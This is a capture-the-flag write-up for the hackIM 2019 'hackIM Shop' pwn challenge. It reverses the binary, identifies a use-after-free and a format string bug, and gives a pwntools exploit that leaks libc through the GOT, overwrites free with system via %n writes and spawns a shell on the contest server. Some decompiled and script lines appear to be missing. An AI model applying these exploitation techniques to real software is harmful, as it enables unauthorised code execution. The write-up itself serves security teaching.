# hackIM Shop
This is pwn 458 from hackIM 2019. Quick disclamer I was playing for Kernel Sanders when I solved this challenge, however I posted it under Knightsec's name (since that was the team I am on in ctftime)
### Reversing
Let's take a look at the binary:
$ file challenge
challenge: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fe602c2cb2390d3265f28dc0d284029dc91a2df8, not stripped
$ pwn checksec challenge
[*] '/Hackery/hackIM/store/challenge'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
So we are dealing with a `64` bit binary with no PIE or RELRO. When we run the binary, we see that we have the option to add, remove and view books.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
int v3; // eax@4
char buf; // [sp+10h] [bp-10h]@2
__int64 v5; // [sp+18h] [bp-8h]@1
v5 = *MK_FP(__FS__, 40LL);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
while ( 1 )
if ( read(0, &buf, 2uLL) )
v3 = atol(&buf;;
switch ( v3 )
case 2:
case 3:
case 1:
puts("Invalid option");
perror("Err read option\r\n");
so we can see the main function, it essentially just acts as a menu which launches the `remove_book`, `view_books`, and `add_book` functions.
__int64 add_book()
unsigned __int64 sizeScan; // rax@3
__int64 v1; // rbx@5
__int64 v2; // rbx@6
__int64 v3; // rax@7
int i; // [sp+Ch] [bp-34h]@7
void *bookPtr; // [sp+10h] [bp-30h]@3
size_t size; // [sp+18h] [bp-28h]@3
__int64 v8; // [sp+28h] [bp-18h]@1
v8 = *MK_FP(__FS__, 40LL);
if ( num_books == 16 )
puts("Cart limit reached!");
bookPtr = malloc(0x38uLL);
printf("Book name length: ");
LODWORD(sizeScan) = readint();
size = sizeScan;
if ( sizeScan <= 0xFF )
printf("Book name: ");
*((_QWORD *)bookPtr + 1) = malloc(size);
read(0, *((void **)bookPtr + 1), size);
v1 = *((_QWORD *)bookPtr + 1);
if ( *(_BYTE *)(v1 + strlen(*((const char **)bookPtr + 1)) - 1) == 10 )
v2 = *((_QWORD *)bookPtr + 1);
*(_BYTE *)(v2 + strlen(*((const char **)bookPtr + 1)) - 1) = 0;
printf("Book price: ");
LODWORD(v3) = readint();
*((_QWORD *)bookPtr + 2) = v3;
for ( i = 0; *(&books + i); ++i )
*(&books + i) = bookPtr;
*(_QWORD *)*(&books + i) = i;
strcpy((char *)*(&books + i) + 24, cp_stmt);
puts("Too big!");
return *MK_FP(__FS__, 40LL) ^ v8;
So here is the function which adds books. We can see that it first allocates a chunk of memory with malloc, then allocates a second chunk of memory with malloc, and the ptr to that is stored in the first chunk of memory at offset `8`. In the second chunk of memory, we get to scan in up to `0xff` bytes of memory (depending on what we give it as a size), and the chunk of memory scales with it. After that it prompts us for the price of the books. Finally it stores the initial pointer in `books` which is the bss address `0x6021a0`, increments the count of books `num_books` (bss address `0x6020e0`), and then copies the string `Copyright NullCon Shop` stored in `cp_stmt` to the first chunk of memory. Also there is a limit of `0xf` on how many books we can have allocated at a time.
int view_books()
__int64 v0; // ST08_8@3
signed int i; // [sp+4h] [bp-Ch]@1
puts("\t\"Books\" : [");
for ( i = 0; i <= 15; ++i )
if ( *(&books + i) )
v0 = *(_QWORD *)*(&books + i);
printf("\t\t\t\"index\": %ld,\n", v0);
printf("\t\t\t\"name\": \"%s\",\n", *((_QWORD *)*(&books + i) + 1));
printf("\t\t\t\"price\": %ld,\n", *((_QWORD *)*(&books + i) + 2));
printf("\t\t\t\"rights\": \"");
printf((const char *)*(&books + i) + 24);
if ( *(&books + i + 1) )
return puts("}");
Here we can see the `view_books` function, which prints out the various info about the books. We can see that there is a format string bug with `printf((const char *)*(&books + i) + 24);`, since it is printing a non static string without a specifiec format string. However we will need another bug to effectively use it.
int remove_book()
unsigned __int64 v0; // rax@1
int result; // eax@2
unsigned __int64 v2; // [sp+8h] [bp-8h]@1
printf("Book index: ");
LODWORD(v0) = readint();
v2 = v0;
if ( (unsigned int)num_books > v0 )
free(*((void **)*(&books + v0) + 1));
free(*(&books + v2));
result = num_books-- - 1;
result = puts("Invalid index");
return result;
Here we can see is the `remove_book` function. It checks to see if the book is valid by checking if the index given is larger than the count of currently allocated books `num_books`, which is a bug. However we see that if the check is passed, that it just frees the two pointers for the associated bug, and decrements `num_books`. However after it frees the pointers, it doesn't get rid of them from `books` (or anywhere else), and doesn't directly edit the data stored there (unless free/malloc does), so we have a use after free bug here.
### Infoleak
Since PIE is disabled, we know the addresses of the got table entries. Since RELRO is disabled, we can write to it. Our plan will essentially be to overwrite a pointer that is printed with that of a got table address, and print it, using the use after free bug. This will print out the libc address for the corresponding function for the got table, which we can use to calculate the address of `system` (with gdb, we can print the addresses of the functions and see the offset). From there we will use the use after free bug to overwrite the rights sections of the books with format strings, to overwrite the got table entry for free with `system` (since free is bassed a pointer to data we control, it will make passing a char pointer `/bin/sh\x00` to `system` easy).
For leaking the libc address, I started off by just allocating a lot of books of the same size (`50` because I felt like it). After that, I removed a lot of the books I allocated, then allocated one more, and checked with gdb to see the offset between that and a pointer which is printed. Here is an example in gdb, where I allocated five `50` byte chunks, freed them, then allocated a new book with the name `15935728`:
Legend: code, data, rodata, value
Stopped reason: SIGINT
0x00007ffff7af4081 in __GI___libc_read (fd=0x0, buf=0x7fffffffdf80, nbytes=0x2)
at ../sysdeps/unix/sysv/linux/read.c:27
27 ../sysdeps/unix/sysv/linux/read.c: No such file or directory.
gdb-peda$ find 15935728
Searching for '15935728' in: None ranges
Found 1 results, display max 1 items:
[heap] : 0x603360 ("15935728\n3`")
gdb-peda$ x/x 0x603360
0x603360: 0x31
gdb-peda$ x/5g 0x603360
0x603360: 0x3832373533393531 0x000000000060330a
0x603370: 0x0000000000000005 0x6867697279706f43
0x603380: 0x6f436c6c754e2074
As you can see, it is just eight bytes from the start of our input before we start overwriting (and we can see, that I even overwrote the least significant byte of the pointer with a newline `0x0a` character). We can tell that this is a pointer to main, since the address `0x603360` (which is eight bytes before the start of the pointer) is stored in `books`, which from our earlier work we know that the pointer here is to name. With that, we can just write `8` bytes to reach the pointer, overwrite it with a got table address. After that we can just view the books, and we will have our libc infoleak.
### Format String
Now that we have the libc leak, we know where the address of system is. We will now exploit the format string bug to write the address of system to the got address of free, by overwriting the string `Copyright NullCon Shop` which is printed without a format string. Looking in gdb, with books allocated for 50 byte names, we see that the offset from the start of our new books (after we allocate and free a bunch of books) is `24` bytes. Using the traditional method of seeing where our input is on the stack with (check `https://github.com/guyinatuxedo/ctf/tree/master/backdoorctf/bbpwn` for more on that, however since it is `64` bit you will have to use `%lx` ) we can see that the start of our input can be reached at `%7$lx` (input being first eight bytes of the new book name).
Now for the actual write itself, I will do three writes of two bytes each. The reason for this being, we can see using the infoleak that libc addresses for the binary, the highest two bytes are 0x0000, which are taken care of by the format string write (since if we write `0x0a`, it will append null bytes to the front of it due to the data value being written). This just leaves us with 6 bytes essentially that we need to worry about being written. I decided to just do three writes of two bytes each (just a balance between amount of bytes being written versus number of writes I decided on). We need to do multiple writes, since when we do a format string write, it will print the amount of bytes equivalent to the write, and if we were to do it all in one giant write it would crash usually. Also we needed to write the lowest two bytes, then the second lowest two bytes, and then finally the third lowest two bytes, because of the additional zeroes, we would be overwriting data we have written with a previous write. To find out the order of the writes, we just look at the order in which they are printed (first data printed = first write). Also to specify amount of bytes being written we will just append `%Yx` right before the `%7$n`, to write `Y` bytes (for instance `%5x` to write 5 bytes). With all of this, we can write our exploit.
### Exploit
One thing I will say, I had a lot of troubke doing I/O with the program while I was doing exploit dev (probably an issue with my exploit dev). Also these problems didn't persist entirely on the remote target, as such I ended up writing two seperate exploits, one for a local copy, and one for the remote. You will find both in this repo, however here is the local one. They essentially do the same thing, just slightly different in how.
from pwn import *
#target = remote("pwn.ctf.nullcon.net", 4002)
target = process('./challenge')
# function to add books
def addBook(size, price, payload):
print target.recvuntil('>')
# function to add books with a null byte in it's name
# for some reason, we need to send an additional byte
def addBookSpc(size, price, payload):
# this is a function to delete books
def deleteBook(index):
# add a bunch of books to use late with the use after free
addBook(50, 5, "0"*50)
addBook(50, 5, "1"*50)
addBook(50, 5, "2"*50)
addBook(50, 5, "3"*50)
addBook(50, 5, "4"*50)
addBook(50, 5, "5"*50)
addBook(50, 5, "6"*50)
addBookSpc(50, 5, "/bin/sh\x00") # this book will contain the "/bin/sh" string to pass a pointer to free
addBook(50, 5, "8"*50)
addBook(50, 5, "9"*50)
addBook(50, 5, "x"*50)
addBook(50, 5, "y"*50)
addBook(50, 5, "9"*50)
addBook(50, 5, "q"*50)
# delete the books, to setup the use after free
# This is the initial overflow of a pointer with the got address of `puts` to get the libc infoleak
addBookSpc(50, 5, "15935728"*1 + p64(0x602028) + "z"*8 + "%7$lx.")
# Display all of the books, to get the libc infoleak
# Filter out the infoleak
print target.recvuntil('{')
print target.recvuntil('{')
print target.recvuntil('{')
print target.recvuntil('{')
print target.recvuntil("\"name\": \"")
leak = target.recvuntil("\"")
leak = leak.replace("\"", "")
print "leak is: " + str(leak)
leak = u64(leak + "\x00"*(8 - len(leak)))
# Subtract the offset to system from puts from the infoleak, to get the libc address of system
leak = leak - 0x31580
print "leak is: " + hex(leak)
# do a bit of binary math to get the
part0 = str(leak & 0xffff)
part1 = str(((leak & 0xffff0000) >> 16))
part2 = str(((leak & 0xffff00000000) >> 32))
print "part 0: " + hex(int(part0))
print "part 1: " + hex(int(part1))
print "part 2: " + hex(int(part2))
# Add the three books to do the format string
# We need the 0x602028 address still to not cause a segfault when it prints
# the got address we are trying to overwrite is at 0x602018
addBookSpc("50", "5", p64(0x60201a) + p64(0x602028) + "z"*8 + "%" + part1 + "x%7$n")
addBookSpc("50", "5", p64(0x602018) + p64(0x602028) + "z"*8 + "%" + part0 + "x%7$n")
addBookSpc("50", "5", p64(0x60201c) + p64(0x602028) + "z"*8 + "%" + part2 + "x%7$n")
# Print the books to execute the format string write
# Free the book with "/bin/sh" to pass a pointer to "/bin/sh" to system
# Drop to an interactive shell
and when we run the remote exploit:
$ python exploit.py
[+] Opening connection to pwn.ctf.nullcon.net on port 4002: Done
NullCon Shop
(1) Add book to cart
(2) Remove from cart
(3) View cart
(4) Check out
. . .
$ w
18:51:13 up 7 days, 3:10, 0 users, load average: 0.03, 0.13, 0.07
$ ls
$ cat flag
$ w
[*] Got EOF while reading in interactive
[*] Interrupted
[*] Closed connection to pwn.ctf.nullcon.net port 4002
Just like that, we get the flag `hackim19{h0p3_7ha7_Uaf_4nd_f0rm4ts_w3r3_fun_4_you}`